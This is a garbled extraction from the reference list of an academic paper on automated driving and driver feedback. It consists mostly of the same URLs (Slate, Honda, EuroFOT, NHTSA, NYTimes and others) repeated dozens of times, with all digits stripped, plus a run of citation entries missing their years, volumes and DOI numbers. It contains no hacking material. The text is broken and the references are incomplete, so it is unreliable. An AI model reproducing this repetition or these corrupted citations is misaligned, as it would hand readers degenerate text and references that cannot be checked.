/google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://www.slate.com/articles/technology/technology/ / /google_self_driving_car_it_may_never_actually_happen.html http://dx.doi.org/ . / - - - - http://dx.doi.org/ . / x http://dx.doi.org/ . /s http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://owners.honda.com/vehicles/information/ /accord-coupe/features/forward-collision-warning/ http://dx.doi.org/ . /j.trc. . . http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp v dld _final_report.pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://www-nrd.nhtsa.dot.gov/pdf/esv/esv / - .pdf http://dx.doi.org/ . /peerj-cs. kittur a, chi eh, suh b. . crowdsourcing user studies with mechanical turk. in: proceedings of the sigchi conference on human factors in computing systems. new york: acm press, – . kulas jt, stachowski aa. . middle category endorsement in odd-numbered likert response scales: associated item characteristics, cognitive demands, and preferred meanings. journal of research in personality : – doi . /j.jrp. . . . kulas jt, stachowski aa, haynes ba. . middle response functioning in likert-responses to personality items. journal of business and psychology : – doi . /s - - - . kyriakidis m, happee r, de winter jcf. . public opinion on automated driving: results of an international questionnaire among respondents. transportation research part f: traffic psychology and behaviour : – doi . /j.trf. . . . large dr, burnett ge. . drivers’ preferences and emotional responses to satellite navigation voices. international journal of vehicle noise and vibration : – doi . /ijvnv. . . larsson af, kircher k, hultgren ja. . learning from experience: familiarity with acc and responding to a cut-in situation in automated driving. transportation research part f: traffic psychology and behaviour : – doi . /j.trf. . . . lee ah, stevenson mr, wang k, yau kkw. . modeling young driver motor vehicle crashes: data with extra zeros. accident analysis & prevention : – doi . /s - ( ) - . lee jd. . technology and teen drivers. journal of safety research : – doi . /j.jsr. . . . levitan l, golembiewski g, bloomfield jr. . human factors issues for automated highway systems. its journal : – doi . / . llaneras re, salinger ja, green ca. . human factors issues associated with limited ability autonomous driving systems: drivers’ allocation of visual attention to the forward roadway. in: proceedings of the th international driving symposium on human factors in driver assessment, training and vehicle design, bolton landing, ny. – . lumbreras m, sánchez j, barcia m. . a d sound hypermedial system for the blind. in: proceedings of the first european conference on disability, virtual reality and associated technologies, maidenhead, uk. – . available at http://www.icdvrat.org/ /papers/ .pdf (accessed july ). markoff j. . google cars drive themselves, in traffic. the new york times available at http:// www.nytimes.com/ / / /science/ google.html (accessed july ). mason w, suri s. . conducting behavioral research on amazon’s mechanical turk. behavior research methods : – doi . /s - - - . matthews ml, moran ar. . age differences in male drivers’ perception of accident risk: the role of perceived driving ability. accident analysis & prevention : – doi . / - ( ) - . merat n, jamson ah, lai fc, carsten o. . highly automated driving, secondary task performance, and driver state. human factors : – doi . / . mercedes-benz. . pre-safe. available at http://www .mercedes-benz.co.uk/content/ unitedkingdom/mpc/mpc unitedkingdom website/en/home mpc/passengercars/home/corporate sales /fleet/leasing/our advantages/safety. .html (accessed november ). bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /j.jrp. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.trf. . . http://dx.doi.org/ . /ijvnv. . http://dx.doi.org/ . /j.trf. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.jsr. . . http://dx.doi.org/ . / http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.icdvrat.org/ /papers/ _ .pdf http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://www.nytimes.com/ / / /science/ google.html http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www 